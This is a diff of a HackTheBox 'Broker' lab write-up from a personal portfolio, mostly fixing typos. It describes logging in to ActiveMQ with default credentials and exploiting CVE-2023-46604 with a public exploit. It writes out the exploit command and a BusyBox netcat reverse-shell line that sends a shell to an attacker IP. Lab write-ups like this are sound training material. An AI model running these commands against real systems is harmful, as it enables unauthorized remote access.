Hussam-creator/cybersecurity-portfolio/writeups/HackTheBox Writeups/Broker.md/README.md

 ![creds](Images/default-creds.png)

-Once we are authenticated, we are take to the welcome page for ActiveMQ.
-The top link 'Manage ActiveMQ broker' instantly grabbed my attention.
-This link reveals the /admin endpoint which reveals further confirms our previous findings relating to the version of the service running.
+Once we are authenticated, we are take to the ActiveMQ welcome page.
+The top link `Manage ActiveMQ broker` instantly grabbed my attention.
+This link reveals the /admin endpoint and confirms our previous findings relating to the version of the service running.

 ![home](Images/home.png)
 ![admin](Images/version.png)

 The target is running Apache ActiveMQ version 5.15.15.
-This version is affected by CVE-2023-46604, which can be leverage to achive remote code execution.
+This version is affected by CVE-2023-46604, which can be leverage to achieve remote code execution.
 A public exploit was found that generates a pseudo shell due to the unsafe deserialization within the OpenWire protocol.

 <https://github.com/duck-sec/CVE-2023-46604-ActiveMQ-RCE-pseudoshell/blob/master/README.md>

 ### Exploitation

-The vulnerability was confirmed and exploited using the following command, leading to successful remote code execution;
+The vulnerability was confirmed and exploited using the following command, leading to successful remote code execution:
 ```
 python3 exploit.py -i 10.129.230.87 -p 61616 -si 10.10.14.170 -sp 8080
 ```

 ![exploit](Images/exploit.png)

-A BusyBox reverse shell was used to upgrade the intial foothold into a more stable and interactive shell for further exploitation.
+A BusyBox reverse shell was used to upgrade the initial foothold into a more stable and interactive shell for further exploitation.

 ```
 busybox nc 10.10.14.170 4444 -e /bin/bash